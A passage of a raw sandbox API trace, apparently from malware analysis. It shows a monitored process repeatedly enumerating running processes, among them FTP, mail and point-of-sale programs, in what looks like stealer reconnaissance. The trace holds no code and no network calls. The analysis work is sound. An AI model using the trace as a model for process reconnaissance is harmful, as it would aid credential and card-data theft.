[0166.402] Process32Next (in: hSnapshot=0x1c60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0166.404] Process32Next (in: hSnapshot=0x1c60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0166.405] Process32Next (in: hSnapshot=0x1c60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0166.407] Process32Next (in: hSnapshot=0x1c60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0166.409] Process32Next (in: hSnapshot=0x1c60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0166.411] Process32Next (in: hSnapshot=0x1c60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0166.413] Process32Next (in: hSnapshot=0x1c60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0166.416] Process32Next (in: hSnapshot=0x1c60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0166.418] Process32Next (in: hSnapshot=0x1c60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0166.420] Process32Next (in: hSnapshot=0x1c60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0166.422] Process32Next (in: hSnapshot=0x1c60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0166.430] Process32Next (in: hSnapshot=0x1c60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0166.432] Process32Next (in: hSnapshot=0x1c60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0166.434] Process32Next (in: hSnapshot=0x1c60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0166.441] Process32Next (in: hSnapshot=0x1c60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0166.443] Process32Next (in: hSnapshot=0x1c60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0166.445] Process32Next (in: hSnapshot=0x1c60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0166.447] Process32Next (in: hSnapshot=0x1c60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0166.449] Process32Next (in: hSnapshot=0x1c60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0166.452] Process32Next (in: hSnapshot=0x1c60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0166.454] Process32Next (in: hSnapshot=0x1c60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0166.456] Process32Next (in: hSnapshot=0x1c60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0166.458] Process32Next (in: hSnapshot=0x1c60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0166.460] Process32Next (in: hSnapshot=0x1c60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0166.462] Process32Next (in: hSnapshot=0x1c60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0166.464] Process32Next (in: hSnapshot=0x1c60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0166.467] Process32Next (in: hSnapshot=0x1c60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0166.471] Process32Next (in: hSnapshot=0x1c60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0166.474] Process32Next (in: hSnapshot=0x1c60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0166.476] Process32Next (in: hSnapshot=0x1c60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0166.478] Process32Next (in: hSnapshot=0x1c60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0166.482] Process32Next (in: hSnapshot=0x1c60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0166.484] Process32Next (in: hSnapshot=0x1c60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0166.486] Process32Next (in: hSnapshot=0x1c60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0166.488] Process32Next (in: hSnapshot=0x1c60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0166.490] Process32Next (in: hSnapshot=0x1c60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0166.493] Process32Next (in: hSnapshot=0x1c60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0166.495] Process32Next (in: hSnapshot=0x1c60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0166.496] Process32Next (in: hSnapshot=0x1c60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0166.498] Process32Next (in: hSnapshot=0x1c60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0166.500] Process32Next (in: hSnapshot=0x1c60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0166.502] Process32Next (in: hSnapshot=0x1c60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0166.504] Process32Next (in: hSnapshot=0x1c60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0166.514] Process32Next (in: hSnapshot=0x1c60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0166.517] Process32Next (in: hSnapshot=0x1c60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0166.519] Process32Next (in: hSnapshot=0x1c60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0166.521] Process32Next (in: hSnapshot=0x1c60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0166.523] Process32Next (in: hSnapshot=0x1c60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0166.525] Process32Next (in: hSnapshot=0x1c60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0166.527] Process32Next (in: hSnapshot=0x1c60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0166.529] Process32Next (in: hSnapshot=0x1c60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0166.533] Process32Next (in: hSnapshot=0x1c60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0166.535] Process32Next (in: hSnapshot=0x1c60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0166.537] Process32Next (in: hSnapshot=0x1c60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0166.540] Process32Next (in: hSnapshot=0x1c60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0166.542] Process32Next (in: hSnapshot=0x1c60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0166.543] Process32Next (in: hSnapshot=0x1c60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0166.546] Process32Next (in: hSnapshot=0x1c60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0166.548] Process32Next (in: hSnapshot=0x1c60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0166.552] Process32Next (in: hSnapshot=0x1c60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0166.554] Process32Next (in: hSnapshot=0x1c60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0166.556] Process32Next (in: hSnapshot=0x1c60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0166.558] Process32Next (in: hSnapshot=0x1c60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0166.560] Process32Next (in: hSnapshot=0x1c60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0166.562] Process32Next (in: hSnapshot=0x1c60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0166.563] Process32Next (in: hSnapshot=0x1c60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0166.565] Process32Next (in: hSnapshot=0x1c60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0166.567] Process32Next (in: hSnapshot=0x1c60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0166.569] Process32Next (in: hSnapshot=0x1c60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0166.571] Process32Next (in: hSnapshot=0x1c60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1398, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0166.573] Process32Next (in: hSnapshot=0x1c60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0166.575] Process32Next (in: hSnapshot=0x1c60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0166.577] Process32Next (in: hSnapshot=0x1c60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0166.579] Process32Next (in: hSnapshot=0x1c60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 0 [0166.582] CloseHandle (hObject=0x1c60) returned 1 [0166.583] Sleep (dwMilliseconds=0x64) [0166.709] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1c70 [0166.723] Process32First (in: hSnapshot=0x1c70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0166.725] Process32Next (in: hSnapshot=0x1c70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0166.727] Process32Next (in: hSnapshot=0x1c70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0166.728] Process32Next (in: hSnapshot=0x1c70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0166.730] Process32Next (in: hSnapshot=0x1c70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0166.733] Process32Next (in: hSnapshot=0x1c70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0166.735] Process32Next (in: hSnapshot=0x1c70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0166.737] Process32Next (in: hSnapshot=0x1c70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0166.738] Process32Next (in: hSnapshot=0x1c70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0166.740] Process32Next (in: hSnapshot=0x1c70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, 